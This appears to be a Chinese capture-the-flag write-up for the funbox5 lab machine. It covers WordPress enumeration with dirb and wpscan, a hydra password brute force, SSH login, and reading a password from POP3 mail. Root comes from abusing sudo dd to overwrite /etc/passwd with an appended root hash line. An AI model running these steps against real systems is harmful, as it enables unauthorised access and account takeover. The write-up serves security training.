kali:192.168.231.135
靶机:192.168.231.190
1.获取靶机IP地址
2.查看目标开放的端口
目标开放了22和80端口
3.访问目标网站
没有什么发现
4.进行目录扫描
扫描出一个drupal目录和两个txt页面,访问它们
访问这两个txt页面没发现有用的信息
访问/drupal目录时发现被重定向到了192.168.178.33
使用dirb扫描一下/drupal目录
┌──(lonelyor㉿Kali)-[~]
└─$ dirb http://192.168.231.190/drupal/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Feb 28 10:49:23 2024
URL_BASE: http://192.168.231.190/drupal/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.231.190/drupal/ ----
+ http://192.168.231.190/drupal/index.php (CODE:200|SIZE:62847)
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/
==> DIRECTORY: http://192.168.231.190/drupal/wp-includes/
+ http://192.168.231.190/drupal/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/ ----
+ http://192.168.231.190/drupal/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/css/
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/images/
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/includes/
+ http://192.168.231.190/drupal/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/js/
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/maint/
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/network/
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/user/
---- Entering directory: http://192.168.231.190/drupal/wp-content/ ----
+ http://192.168.231.190/drupal/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/languages/
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/plugins/
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/themes/
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/upgrade/
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/uploads/
---- Entering directory: http://192.168.231.190/drupal/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/network/ ----
+ http://192.168.231.190/drupal/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.231.190/drupal/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.231.190/drupal/wp-admin/user/ ----
+ http://192.168.231.190/drupal/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.231.190/drupal/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.231.190/drupal/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-content/plugins/ ----
+ http://192.168.231.190/drupal/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.231.190/drupal/wp-content/themes/ ----
+ http://192.168.231.190/drupal/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.231.190/drupal/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.231.190/drupal/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Feb 28 10:50:14 2024
DOWNLOADED: 32284 - FOUND: 11通过扫描,发现该网站的cms像wordpress
5.访问一下/drupal/index.php页面
还真是wordpress的cms
6.使用wpscan枚举一下用户
┌──(lonelyor㉿Kali)-[~]
└─$ wpscan --url http://192.168.231.190/drupal/index.php --wp-content-dir=192.168.231.190/drupal/wp-content -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.231.190/drupal/index.php/ [192.168.231.190]
[+] Started: Wed Feb 28 11:27:24 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.231.190/drupal/index.php/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.231.190/drupal/index.php/, Match: 'WordPress 5.5.1'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.231.190/drupal/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] ben
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.231.190/drupal/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 28 11:29:04 2024
[+] Requests Done: 54
[+] Cached Requests: 8
[+] Data Sent: 13.761 KB
[+] Data Received: 1.257 MB
[+] Memory used: 158.688 MB
[+] Elapsed time: 00:01:39
枚举出两个用户:admin和ben
7.使用hydra爆破一下密码
扫描出ben的密码pookie
8.连接ssh
成功登录
9.查看一下信息
发现用户ben在mail组中,并且目录下还有mail文件夹,猜测有邮件服务
使用netstat查看一下
发现110(pop3)端口为listen状态
10.尝试连接110端口
成功连接,并发现三封邮件
查看三封邮件
list
+OK 3 messages:
1 403
2 391
3 578
.
retr 1
+OK 403 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80g014898
for ben@localhost; Mon, 31 Aug 2020 14:47:42 +0200
Date: Mon, 31 Aug 2020 14:46:08 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311247.07VCk80g014898@funbox5.fritz.box>
Hi Ben,
are you going to Jonas' party on Saturday?
.
retr 2
+OK 391 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80h014898
for ben@localhost; Mon, 31 Aug 2020 14:54:40 +0200
Date: Mon, 31 Aug 2020 14:54:40 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311254.07VCk80h014898@funbox5.fritz.box>
Hey Ben,
did you do all the updates?
.
retr 3
+OK 578 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VD43wQ015008
for ben@localhost; Mon, 31 Aug 2020 15:04:40 +0200
Date: Mon, 31 Aug 2020 15:04:03 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311304.07VD43wQ015008@funbox5.fritz.box>
Hi Ben,
please come to my office at 10:00 a.m. We have a lot to talk about!
The new employees must be created. I've already finished Adam.
adam: qwedsayxc!11.发现了一组用户名和密码,尝试登录到adam用户中
12.使用sudo -l 查看一下以root身份运行的命令
发现有dd,de和df三个命令
查看一下dd提权
使用dd命令将/etc/passwd文件复制到当前目录
编辑一下passwd,但是没有执行权限,所有将passwd下载到本地,然后修改完成后再上传回来
自己随便生成一个密码,例如:root,然后写入到passwd文件中,写入之前,要先把之前的root行删除
┌──(lonelyor㉿Kali)-[~/funbox5]
└─$ sudo echo 'root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash' >> passwd
┌──(lonelyor㉿Kali)-[~/funbox5]
└─$ cat passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash修改完成后将文件上传回去
然后使用dd命令将/etc/passwd文件的内容改为/tmp/passwd文件的内容
尝试登录root用户
得到flag
951
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
